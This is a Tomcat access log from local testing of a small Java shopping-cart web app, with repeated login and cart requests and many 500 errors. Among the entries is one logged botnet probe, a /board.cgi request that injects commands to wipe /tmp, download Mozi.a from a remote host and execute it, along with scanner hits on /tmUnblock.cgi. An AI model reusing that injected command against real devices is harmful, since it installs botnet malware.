0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:44:54 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:22 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:22 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 36
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:22 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 468
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:25 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:30 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:31 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:32 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 3901 http-bio-8080-exec-8 16
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:32 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:59 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 3901 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:46:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:49:55 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5261 http-bio-8080-exec-4 28
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:49:55 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:49:56 +0800] "GET /eswz/insertCart HTTP/1.1" 500 11953 http-bio-8080-exec-4 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:09 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:09 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 34
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:10 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 512
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:11 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:19 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:20 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:22 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5261 http-bio-8080-exec-8 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:22 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:53:23 +0800] "GET /eswz/insertCart HTTP/1.1" 500 11953 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:42 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:42 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 35
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:43 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 818
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:46 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:51 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:52 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:53 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5261 http-bio-8080-exec-8 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:55 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:56 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:57 +0800] "GET /eswz/detailGoods?goodsid=9 HTTP/1.1" 200 5278 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:57 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:58:58 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:59:00 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:59:01 +0800] "GET /eswz/detailGoods?goodsid=8 HTTP/1.1" 200 4905 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:59:01 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-8 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:59:02 +0800] "GET /eswz/insertCart HTTP/1.1" 200 61 http-bio-8080-exec-8 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:59:03 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:59:14 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5730 http-bio-8080-exec-8 72
0:0:0:0:0:0:0:1 - - [19/Nov/2022:16:59:46 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5730 http-bio-8080-exec-4 43
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:06:09 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:06:10 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 48
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:06:10 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 747
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:06:12 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:06:19 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:06:20 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 33
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:06:23 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19342 http-bio-8080-exec-8 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:09:48 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:09:48 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:09:49 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 449
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:09:52 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:09:57 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:09:59 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:00 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19342 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:10 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19342 http-bio-8080-exec-2 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:42 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:42 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:42 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 443
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:44 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:50 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:51 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:10:55 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19453 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:11:06 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19453 http-bio-8080-exec-2 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:12:08 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:12:08 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 42
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:12:08 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 566
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:12:11 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:12:17 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:12:18 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:12:19 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5730 http-bio-8080-exec-8 69
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:13:22 +0800] "GET /eswz HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:13:55 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:13:55 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:13:55 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 423
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:13:56 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:13:58 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:14:03 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:14:04 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 35
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:14:06 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5730 http-bio-8080-exec-9 71
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:16:35 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:16:36 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 44
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:16:36 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 677
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:16:39 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:16:43 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:16:44 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 31
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:16:46 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6434 http-bio-8080-exec-8 724
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:18:59 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:18:59 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 40
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:19:00 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 490
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:19:02 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:19:07 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:19:08 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:19:10 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6437 http-bio-8080-exec-8 732
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:14 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:14 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 43
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:15 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 502
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:15 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:16 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:20 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:21 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:21:22 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5726 http-bio-8080-exec-9 72
120.229.24.175 - - [19/Nov/2022:17:22:11 +0800] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://120.229.24.175:59453/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 - http-bio-8080-exec-10 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:29:27 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:29:27 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 86
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:29:27 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 698
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:29:30 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:29:35 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:29:36 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:29:38 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5726 http-bio-8080-exec-8 62
0:0:0:0:0:0:0:1 - - [19/Nov/2022:17:31:50 +0800] "GET /eswz HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:40 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:40 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 57
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:41 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 710
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:42 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:46 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-7 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:52 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-9 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:53 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 35
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:05:54 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5726 http-bio-8080-exec-10 92
197.157.195.252 - - [19/Nov/2022:21:08:05 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-3 0
78.108.177.52 - - [19/Nov/2022:21:11:37 +0800] "GET / HTTP/1.0" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:15:44 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:15:44 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 39
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:15:44 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 569
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:15:47 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:15:52 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:15:53 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 32
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:15:55 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5726 http-bio-8080-exec-8 78
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:19:52 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:19:52 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 33
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:19:52 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 437
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:19:57 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:20:02 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:20:03 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:20:04 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 12905 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:24:26 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:24:26 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:24:26 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 442
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:24:29 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:24:34 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:24:36 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-9 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:24:42 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19531 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:29:40 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:29:40 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 41
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:29:40 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 518
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:29:42 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:29:47 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:29:48 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:29:50 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 5726 http-bio-8080-exec-8 75
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:31:55 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:31:55 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 36
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:31:56 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 667
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:31:58 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:32:04 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:32:05 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 28
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:32:07 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 7429 http-bio-8080-exec-8 586
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:32:07 +0800] "GET /eswz/img/ HTTP/1.1" 404 969 http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:32:07 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-2 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:32:07 +0800] "GET /eswz/img/ HTTP/1.1" 404 969 http-bio-8080-exec-2 1
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:13 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:13 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 59
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:13 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 768
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:15 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:20 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:21 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:22 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4487 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:22 +0800] "GET /eswz/img/ HTTP/1.1" 404 969 http-bio-8080-exec-2 5
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:22 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:37:22 +0800] "GET /eswz/img/ HTTP/1.1" 404 969 http-bio-8080-exec-9 4
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:38:21 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4502 http-bio-8080-exec-9 546
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:38:21 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:38:46 +0800] "GET /eswz/index?classification.classificationid=2 HTTP/1.1" 200 14469 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:38:48 +0800] "GET /eswz/index?classification.classificationid=3 HTTP/1.1" 200 10871 http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:38:51 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-9 21
52.41.17.143 - - [19/Nov/2022:21:39:05 +0800] "POST /tmUnblock.cgi HTTP/1.1" 404 - http-bio-8080-exec-1 0
34.205.141.248 - - [19/Nov/2022:21:42:31 +0800] "POST /tmUnblock.cgi HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:46:45 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:46:46 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:46:46 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 754
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:46:50 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:47:00 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:47:01 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:47:03 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6424 http-bio-8080-exec-8 580
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:50:09 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6368 http-bio-8080-exec-1 1206
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:50:14 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-2 73
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:50:16 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-4 7
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:50:20 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-5 11
